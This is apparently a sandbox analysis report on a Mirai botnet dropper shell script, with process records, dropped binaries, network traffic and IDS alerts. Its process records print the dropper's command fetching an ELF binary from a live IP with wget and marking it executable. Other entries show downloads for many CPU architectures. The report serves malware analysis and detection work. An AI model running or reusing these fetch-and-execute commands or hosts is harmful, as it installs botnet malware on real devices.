File name:

_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1.sh

Full analysis: https://app.any.run/tasks/b4c8f5b7-a550-46c6-a8a9-b25e44ccca11
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Analysis date: March 14, 2026, 07:35:53
OS: Ubuntu 22.04.2
Tags:
mirai
botnet
Indicators:
MIME: text/x-shellscript
File info: POSIX shell script, ASCII text executable
MD5:

F7A5C4491BDAFB2C7F23A7DCADABA33E

SHA1:

F618A6E7710D06B0F483A2CE5C17EF358686520E

SHA256:

0AB70183D671B0A054DEF272C335EE93306E11573E346C59419656F54726AAA1

SSDEEP:

24:mo3h8Lzpxsqpqfe3Q43L2K3b2y3XDj34JU3NIsrt00/BaNYK20:mGeLzXb17xnPI+75sYo

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • MIRAI has been detected (SURICATA)

      • wget (PID: 2000)
      • wget (PID: 2012)
      • wget (PID: 2008)
      • wget (PID: 2004)
      • wget (PID: 2017)
      • wget (PID: 2021)
      • wget (PID: 2013)
      • wget (PID: 2026)
  • SUSPICIOUS

    • Modifies file or directory owner

      • sudo (PID: 1982)
    • Uses wget to download content

      • dash (PID: 1986)
    • Potential Corporate Privacy Violation

      • wget (PID: 1994)
      • wget (PID: 2000)
      • wget (PID: 2004)
      • wget (PID: 2021)
      • wget (PID: 2017)
      • wget (PID: 2026)
      • wget (PID: 2013)
      • wget (PID: 2008)
  • INFO

    • Checks timezone

      • wget (PID: 1988)
      • wget (PID: 1994)
      • wget (PID: 2000)
      • wget (PID: 2012)
      • wget (PID: 2004)
      • wget (PID: 2008)
      • wget (PID: 2017)
      • wget (PID: 2013)
      • wget (PID: 2021)
      • wget (PID: 2026)
      • wget (PID: 2034)
      • wget (PID: 2030)
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
Total processes: 166
Monitored processes: 46
Malicious processes: 11
Suspicious processes: 0

Behavior graph

(graph not reproduced here; its process nodes are dash, sudo, chown, chmod, locale-check, wget, systemctl and tux.x86, with the wget download processes tagged #MIRAI)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 1981
CMD: /bin/sh -c "sudo chown user /home/user/Desktop/_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1\.sh && chmod +x /home/user/Desktop/_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1\.sh "
Path: /usr/bin/dash
Parent process: 2EwNpII9hL0vkNEQ
User:
user
Integrity Level:
UNKNOWN
Exit code:
32256
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
PID: 1982
CMD: sudo chown user /home/user/Desktop/_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1.sh
Path: /usr/bin/sudo
Parent process: dash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
PID: 1983
CMD: chown user /home/user/Desktop/_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1.sh
Path: /usr/bin/chown
Parent process: sudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
PID: 1984
CMD: chmod +x /home/user/Desktop/_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1.sh
Path: /usr/bin/chmod
Parent process: dash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
PID: 1985
CMD: sudo -iu user /home/user/Desktop/_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1.sh
Path: /usr/bin/sudo
Parent process: dash
User:
root
Integrity Level:
UNKNOWN
Exit code:
32256
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
PID: 1986
CMD: /bin/sh /home/user/Desktop/_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1.sh
Path: /usr/bin/dash
Parent process: sudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
32256
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
PID: 1987
CMD: /usr/bin/locale-check C.UTF-8
Path: /usr/bin/locale-check
Parent process: dash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
PID: 1988
CMD: wget -q http://88.214.20.14/bins/tux.x86 -O tux.x86
Path: /usr/bin/wget
Parent process: dash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0
PID: 1989
CMD: systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service
Path: /usr/bin/systemctl
Parent process: snapd
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libcap.so.2.44
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/lib/x86_64-linux-gnu/liblzma.so.5.2.5
/usr/lib/x86_64-linux-gnu/liblz4.so.1.9.3
/usr/lib/x86_64-linux-gnu/libzstd.so.1.4.8
/usr/lib/x86_64-linux-gnu/libblkid.so.1.1.0
/usr/lib/x86_64-linux-gnu/libgcrypt.so.20.3.4
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libgpg-error.so.0.32.1
PID: 1990
CMD: chmod +x tux.x86
Path: /usr/bin/chmod
Parent process: dash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
Executable files: 0
Suspicious files: 11
Text files: 0
Unknown types: 0

Dropped files

PID | Process | Filename | Type
1988 | wget | /home/user/tux.x86 | binary
1994 | wget | /home/user/tux.mips | binary
2000 | wget | /home/user/tux.mpsl | binary
2004 | wget | /home/user/tux.arm | binary
2008 | wget | /home/user/tux.arc | binary
2013 | wget | /home/user/tux.arm5 | binary
2017 | wget | /home/user/tux.arm6 | binary
2021 | wget | /home/user/tux.arm7 | binary
2026 | wget | /home/user/tux.ppc | binary
2030 | wget | /home/user/tux.m68k | binary
(MD5 and SHA256 values for the dropped files are not shown in this report)
HTTP(S) requests: 23
TCP/UDP connections: 44
DNS requests: 17
Threats: 37

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
- | - | POST | 200 | 185.125.188.54:443 | https://api.snapcraft.io/api/v1/snaps/auth/sessions | GB | - | - | unknown
- | - | POST | - | 185.125.188.58:443 | https://api.snapcraft.io/api/v1/snaps/auth/nonces | GB | - | - | -
- | - | POST | 200 | 185.125.188.57:443 | https://api.snapcraft.io/v2/snaps/refresh | GB | text | 39.3 Kb | unknown
- | - | POST | 200 | 185.125.188.59:443 | https://api.snapcraft.io/v2/snaps/refresh | GB | binary | 39.3 Kb | unknown
- | - | GET | 204 | 185.125.190.17:80 | http://connectivity-check.ubuntu.com/ | GB | - | - | whitelisted
- | - | GET | - | 185.125.190.17:80 | http://connectivity-check.ubuntu.com/ | GB | - | - | whitelisted
1988 | wget | GET | 200 | 88.214.20.14:80 | http://88.214.20.14/bins/tux.x86 | DE | binary | 76.8 Kb | unknown
1994 | wget | GET | 200 | 88.214.20.14:80 | http://88.214.20.14/bins/tux.mips | DE | binary | 110 Kb | unknown
2000 | wget | GET | 200 | 88.214.20.14:80 | http://88.214.20.14/bins/tux.mpsl | DE | binary | 114 Kb | unknown
2004 | wget | GET | 200 | 88.214.20.14:80 | http://88.214.20.14/bins/tux.arm | DE | binary | 89.1 Kb | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
456 | avahi-daemon | 224.0.0.251:5353 | - | - | - | whitelisted
- | - | 79.127.216.203:443 | odrs.gnome.org | CDN77 _ | GB | whitelisted
- | - | 185.125.190.17:80 | connectivity-check.ubuntu.com | CANONICAL-AS | GB | whitelisted
- | - | 195.181.170.18:443 | odrs.gnome.org | CDN77 _ | GB | whitelisted
- | - | 185.125.188.59:443 | api.snapcraft.io | CANONICAL-AS | GB | whitelisted
- | - | 185.125.188.57:443 | api.snapcraft.io | CANONICAL-AS | GB | whitelisted
1988 | wget | 88.214.20.14:80 | - | XTOM xTom GmbH | DE | malicious
1992 | tux.x86 | 64.89.161.130:44300 | - | GHOSTYNETWORKS | US | unknown
1994 | wget | 88.214.20.14:80 | - | XTOM xTom GmbH | DE | malicious
2000 | wget | 88.214.20.14:80 | - | XTOM xTom GmbH | DE | malicious

DNS requests

Domain
IP
Reputation
odrs.gnome.org
whitelisted
api.snapcraft.io
whitelisted
connectivity-check.ubuntu.com
whitelisted
google.com
whitelisted
10.100.168.192.in-addr.arpa
whitelisted
ntp.ubuntu.com
whitelisted

Threats

PID | Process | Class | Message
1988 | wget | Potentially Bad Traffic | ET INFO x86 File Download Request from IP Address
1988 | wget | Potentially Bad Traffic | ET HUNTING Suspicious GET Request for .x86
1988 | wget | A Network Trojan was detected | BOTNET [ANY.RUN] Linux/Mirai ELF-file download via wget (x86)
1994 | wget | A Network Trojan was detected | AV INFO Possible Mirai .mips Executable Download
1994 | wget | Potentially Bad Traffic | ET INFO MIPS File Download Request from IP Address
1988 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
1994 | wget | A Network Trojan was detected | BOTNET [ANY.RUN] Linux/Mirai ELF-file download via wget (mips)
1994 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
2000 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
2000 | wget | A Network Trojan was detected | BOTNET [ANY.RUN] Linux/Mirai ELF-file download via wget (mpsl)
No debug info